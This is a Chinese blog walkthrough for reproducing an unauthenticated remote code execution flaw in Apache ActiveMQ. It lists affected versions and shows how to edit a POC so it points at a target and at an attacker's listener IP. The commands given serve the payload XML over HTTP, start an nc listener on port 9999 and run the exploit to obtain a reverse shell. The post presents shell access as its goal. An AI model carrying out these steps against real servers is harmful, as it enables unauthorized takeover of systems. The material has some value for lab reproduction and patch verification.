Apache ActiveMQ 远程代码执行

漏洞概述

当未经身份认证的攻击者访问 Apache ActiveMQ 的 61616 端口时,可通过发送恶意数据在远程服务器上执行代码,进而控制 Apache ActiveMQ 服务器。

版本影响

Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16

漏洞复现

环境详细

  • Apache ActiveMQ服务器:192.168.74.133
  • 攻击机:192.168.74.148

POC下载

修改POC

  • 修改 ActiveMQ.java
    • String ip 的值修改为 Apache ActiveMQ服务器地址
    • String pocxml 的值修改为poc.xml的url地址
  • 修改 poc.xml
    • “niubi.com” 修改为 NC监听机的IP地址
图片[1] - Apache ActiveMQ 远程代码执行 - 极核GetShell

编译&运行POC

  • 攻击机编译POC
javac ActiveMQ.java
  • 攻击机运行http.server,将poc.xml放到当前目录
python3 -m http.server
  • 攻击机NC监听9999端口
nc -lvp 9999
  • 攻击机运行POC
java ActiveMQ
  • 成功获取 Apache ActiveMQ服务器 的Shell

🎖︎GetShell

图片[2] - Apache ActiveMQ 远程代码执行 - 极核GetShell
THE END
点赞66
茶谈区 抢沙发

请登录后发表评论

    暂无评论内容